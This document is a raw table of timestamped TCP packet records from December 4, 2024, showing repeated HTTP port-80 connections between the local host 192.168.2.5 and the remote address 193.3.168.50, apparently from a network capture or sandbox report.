Dec 4, 2024 15:46:19.581216097 CET	49826	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.711019993 CET	49825	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.711020947 CET	49826	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.711301088 CET	49831	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.831075907 CET	80	49831	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:19.831155062 CET	49831	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.831290960 CET	80	49825	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:19.831348896 CET	49825	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.832062960 CET	80	49826	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:19.832118034 CET	49826	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.834403992 CET	49831	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.954113960 CET	80	49831	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:20.180922985 CET	49831	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:20.300702095 CET	80	49831	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:21.070920944 CET	80	49831	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:21.127988100 CET	49831	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:21.305063009 CET	80	49831	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:21.352552891 CET	49831	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:21.461199999 CET	49831	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:21.462614059 CET	49836	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:21.581561089 CET	80	49831	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:21.581654072 CET	49831	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:21.582509041 CET	80	49836	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:21.582587004 CET	49836	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:21.582725048 CET	49836	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:21.702644110 CET	80	49836	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:21.930836916 CET	49836	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:22.050648928 CET	80	49836	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:22.974456072 CET	80	49836	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:23.024409056 CET	49836	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:23.107060909 CET	80	49836	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:23.149404049 CET	49836	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:23.261483908 CET	49836	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:23.261785984 CET	49839	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:23.381555080 CET	80	49839	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:23.381620884 CET	80	49836	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:23.381675959 CET	49839	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:23.381700039 CET	49836	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:23.400053978 CET	49839	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:23.519948006 CET	80	49839	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:23.758928061 CET	49839	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:23.878837109 CET	80	49839	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:24.388849020 CET	49843	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:24.508675098 CET	80	49843	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:24.508826017 CET	49843	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:24.509069920 CET	49843	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:24.628890991 CET	80	49843	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:24.678611040 CET	80	49839	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:24.730245113 CET	49839	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:24.868486881 CET	49843	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:24.912998915 CET	80	49839	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:24.961946964 CET	49839	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:24.988447905 CET	80	49843	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:24.988464117 CET	80	49843	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:25.039892912 CET	49839	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:25.040720940 CET	49844	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:25.160794020 CET	80	49839	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:25.160837889 CET	49839	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:25.160912037 CET	80	49844	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:25.160964966 CET	49844	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:25.161123991 CET	49844	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:25.280855894 CET	80	49844	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:25.509021997 CET	49844	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:25.628808022 CET	80	49844	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:25.748217106 CET	80	49843	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:25.790070057 CET	49843	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:25.981106043 CET	80	49843	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:26.024418116 CET	49843	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:26.408436060 CET	80	49844	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:26.461925983 CET	49844	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:26.640872002 CET	80	49844	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:26.696398973 CET	49844	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:27.470721960 CET	49843	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:27.471025944 CET	49844	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:27.471513987 CET	49851	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:27.590833902 CET	80	49843	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:27.590912104 CET	49843	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:27.591248035 CET	80	49851	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:27.591310024 CET	80	49844	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:27.591365099 CET	49851	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:27.591384888 CET	49844	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:27.591543913 CET	49851	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:27.711529970 CET	80	49851	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:27.947801113 CET	49851	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:28.067760944 CET	80	49851	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:28.930450916 CET	80	49851	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:28.977595091 CET	49851	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:29.160953045 CET	80	49851	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:29.211914062 CET	49851	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:30.221095085 CET	49851	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:30.221714020 CET	49858	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:30.341206074 CET	80	49851	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:30.341272116 CET	49851	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:30.341386080 CET	80	49858	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:30.341448069 CET	49858	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:30.344985008 CET	49858	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:30.464747906 CET	80	49858	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:30.696630001 CET	49858	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:30.816445112 CET	80	49858	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:30.994676113 CET	49862	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:31.114826918 CET	80	49862	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:31.114913940 CET	49862	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:31.115130901 CET	49862	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:31.234921932 CET	80	49862	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:31.462157011 CET	49862	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:31.582416058 CET	80	49862	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:31.582446098 CET	80	49862	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:31.692940950 CET	80	49858	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:31.743220091 CET	49858	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:31.933072090 CET	80	49858	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:31.977550030 CET	49858	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:32.072700977 CET	49858	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:32.073335886 CET	49863	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:32.192949057 CET	80	49858	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:32.193027020 CET	49858	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:32.193048954 CET	80	49863	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:32.193121910 CET	49863	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:32.193655968 CET	49863	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:32.313461065 CET	80	49863	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:32.449049950 CET	80	49862	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:32.524415016 CET	49862	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:32.540335894 CET	49863	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:32.660110950 CET	80	49863	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:32.702038050 CET	80	49862	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:32.744724989 CET	49862	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:33.611274004 CET	80	49863	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:33.665020943 CET	49863	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:33.892024040 CET	80	49863	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:33.946290970 CET	49863	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:34.011861086 CET	49862	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:34.012003899 CET	49863	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:34.013149023 CET	49868	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:34.132093906 CET	80	49862	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:34.132152081 CET	49862	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:34.132580996 CET	80	49863	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:34.132654905 CET	49863	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:34.132858038 CET	80	49868	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:34.132935047 CET	49868	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:34.133877039 CET	49868	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:34.253547907 CET	80	49868	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:34.477924109 CET	49868	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:34.598457098 CET	80	49868	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:35.386024952 CET	80	49868	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:35.430654049 CET	49868	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:35.668945074 CET	80	49868	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:35.711909056 CET	49868	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:35.791347027 CET	49868	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:35.791632891 CET	49873	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:35.911561012 CET	80	49873	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:35.911627054 CET	80	49868	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:35.911720991 CET	49873	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:35.911775112 CET	49868	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:35.935381889 CET	49873	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:36.055593967 CET	80	49873	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:36.293498993 CET	49873	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:36.413750887 CET	80	49873	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:37.283505917 CET	80	49873	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:37.338762999 CET	49873	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.577596903 CET	80	49873	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:37.618160009 CET	49873	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.711493015 CET	49873	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.711838961 CET	49878	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.712744951 CET	49879	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.832735062 CET	80	49873	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:37.832748890 CET	80	49878	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:37.832815886 CET	49873	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.832856894 CET	49878	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.833101988 CET	49878	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.834673882 CET	80	49879	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:37.834770918 CET	49879	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.834846973 CET	49879	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:37.953641891 CET	80	49878	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:37.955367088 CET	80	49879	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:38.180798054 CET	49878	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:38.180891037 CET	49879	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:38.300825119 CET	80	49878	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:38.300849915 CET	80	49879	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:38.300860882 CET	80	49879	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:39.072877884 CET	80	49878	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:39.072951078 CET	80	49879	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:39.118154049 CET	49879	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.118170977 CET	49878	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.310616970 CET	80	49879	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:39.310673952 CET	80	49878	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:39.352559090 CET	49878	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.352570057 CET	49879	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.483052015 CET	49878	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.483112097 CET	49879	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.483494043 CET	49883	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.603255987 CET	80	49878	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:39.603303909 CET	80	49883	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:39.603380919 CET	49878	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.603420019 CET	49883	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.603909969 CET	80	49879	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:39.603959084 CET	49879	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.605309010 CET	49883	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:39.725106955 CET	80	49883	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:39.962182045 CET	49883	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:40.082454920 CET	80	49883	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:40.963120937 CET	80	49883	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:41.008814096 CET	49883	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:41.196679115 CET	80	49883	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:41.243144035 CET	49883	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:41.337275028 CET	49883	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:41.337572098 CET	49888	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:41.457490921 CET	80	49888	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:41.457561970 CET	49888	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:41.457849979 CET	49888	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:41.457942009 CET	80	49883	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:41.457992077 CET	49883	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:41.577534914 CET	80	49888	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:41.805912971 CET	49888	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:41.925641060 CET	80	49888	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:42.775867939 CET	80	49888	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:42.821321011 CET	49888	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:43.008980036 CET	80	49888	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:43.055680990 CET	49888	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:43.230510950 CET	49888	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:43.230879068 CET	49893	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:43.350764036 CET	80	49888	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:43.350786924 CET	80	49893	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:43.350821018 CET	49888	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:43.350888014 CET	49893	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:43.351046085 CET	49893	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:43.470727921 CET	80	49893	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:43.696508884 CET	49893	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:43.816353083 CET	80	49893	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:44.341106892 CET	49898	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:44.461060047 CET	80	49898	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:44.461159945 CET	49898	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:44.461347103 CET	49898	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:44.581159115 CET	80	49898	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:44.625277996 CET	80	49893	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:44.680741072 CET	49893	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:44.808741093 CET	49898	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:44.864938974 CET	80	49893	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:44.915129900 CET	49893	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:44.928752899 CET	80	49898	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:44.929064989 CET	80	49898	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:45.013740063 CET	49893	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:45.014156103 CET	49900	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:45.134495020 CET	80	49900	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:45.134516954 CET	80	49893	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:45.134634972 CET	49900	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:45.134712934 CET	49893	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:45.135040998 CET	49900	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:45.254786968 CET	80	49900	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:45.496392012 CET	49900	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:45.616345882 CET	80	49900	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:45.702735901 CET	80	49898	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:45.743145943 CET	49898	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:45.937028885 CET	80	49898	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:45.977526903 CET	49898	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:46.380949020 CET	80	49900	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:46.430839062 CET	49900	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:46.620774984 CET	80	49900	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:46.665807009 CET	49900	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:46.759144068 CET	49898	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:46.759273052 CET	49900	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:46.759553909 CET	49905	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:46.881050110 CET	80	49905	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:46.881392956 CET	80	49898	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:46.881499052 CET	49898	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:46.881531000 CET	49905	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:46.881733894 CET	49905	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:46.882147074 CET	80	49900	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:46.882385969 CET	49900	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:47.001458883 CET	80	49905	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:47.252177954 CET	49905	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:47.372025967 CET	80	49905	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:48.118787050 CET	80	49905	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:48.165050030 CET	49905	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:48.352654934 CET	80	49905	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:48.399398088 CET	49905	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:48.483676910 CET	49905	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:48.483737946 CET	49909	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:48.603480101 CET	80	49909	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:48.603564024 CET	49909	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:48.603655100 CET	80	49905	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:48.603712082 CET	49905	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:48.610959053 CET	49909	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:48.730772018 CET	80	49909	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:48.971380949 CET	49909	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:49.091166019 CET	80	49909	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:49.843425035 CET	80	49909	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:49.883821964 CET	49909	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:50.077547073 CET	80	49909	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:50.118171930 CET	49909	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:50.197845936 CET	49909	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:50.198276997 CET	49913	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:50.317970037 CET	80	49913	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:50.318058014 CET	80	49909	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:50.318063974 CET	49913	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:50.318111897 CET	49909	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:50.318276882 CET	49913	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:50.438189030 CET	80	49913	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:50.701786995 CET	49913	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:50.821743965 CET	80	49913	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:50.947333097 CET	49918	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:51.067117929 CET	80	49918	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:51.067280054 CET	49918	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:51.067465067 CET	49918	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:51.187189102 CET	80	49918	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:51.415153027 CET	49918	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:51.537251949 CET	80	49918	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:51.538641930 CET	80	49918	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:51.560604095 CET	80	49913	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:51.602591991 CET	49913	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:51.792726040 CET	80	49913	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:51.836908102 CET	49913	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:51.912035942 CET	49913	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:51.912373066 CET	49920	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:52.032213926 CET	80	49920	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:52.032242060 CET	80	49913	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:52.032341003 CET	49920	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:52.032366991 CET	49913	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:52.032530069 CET	49920	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:52.152247906 CET	80	49920	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:52.309066057 CET	80	49918	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:52.352528095 CET	49918	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:52.385529995 CET	49920	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:52.505564928 CET	80	49920	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:52.544935942 CET	80	49918	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:52.586894035 CET	49918	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.318526983 CET	80	49920	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:53.368164062 CET	49920	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.553189039 CET	80	49920	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:53.602525949 CET	49920	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.711760044 CET	49918	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.715176105 CET	49920	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.715631962 CET	49926	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.833199024 CET	80	49918	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:53.833321095 CET	49918	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.836535931 CET	80	49920	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:53.836565971 CET	80	49926	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:53.836622000 CET	49920	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.836724997 CET	49926	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.836966991 CET	49926	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:53.956711054 CET	80	49926	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:54.196463108 CET	49926	80	192.168.2.5	193.3.168.50
